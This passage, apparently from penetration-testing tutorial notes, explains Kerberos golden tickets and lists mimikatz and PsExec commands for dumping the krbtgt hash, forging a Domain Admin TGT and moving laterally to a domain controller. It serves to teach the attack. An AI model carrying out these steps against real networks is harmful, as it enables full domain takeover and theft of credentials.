Going back to the explanation of Kerberos authentication, we recall that when a user requests a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain. That key is derived from the password of a domain account called krbtgt; for the RC4-encrypted tickets mimikatz forges by default, it is simply that account's NTLM hash. Because the TGT is opaque to everyone except the KDC, and the KDC accepts any TGT it can decrypt with that key, getting hold of the krbtgt hash lets us mint our own TGTs for any user and any group membership we like. These forged TGTs are known as golden tickets.

  1. mimikatz.exe
  2. privilege::debug
  3. lsadump::lsa /patch
     dumps the krbtgt NTLM hash; it reads the local LSASS, so it is run on a domain controller we already have administrative access to
  4. kerberos::purge
     clears the cached tickets of the current logon session so only the forged one is used afterwards
  5. kerberos::golden /user:<fakeuser> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt ntlm hash> /ptt
     <sid> is the domain SID (a domain user SID from whoami /user minus the trailing RID); /ptt injects the ticket into memory. Without further options mimikatz puts RID 500 and the Domain Admins / Enterprise Admins groups into the PAC
  6. misc::cmd
     with the golden ticket injected, launches a new command prompt that inherits it
  7. psexec.exe \\<dc_machine> cmd.exe
     again attempt lateral movement to the DC with PsExec; use the hostname, not the IP address, otherwise there is no SPN to request a service ticket for, Windows falls back to NTLM and the ticket is never used
  8. whoami
  9. whoami /groups
     verification: the DC now reports the fake user and the group memberships carried in the forged PAC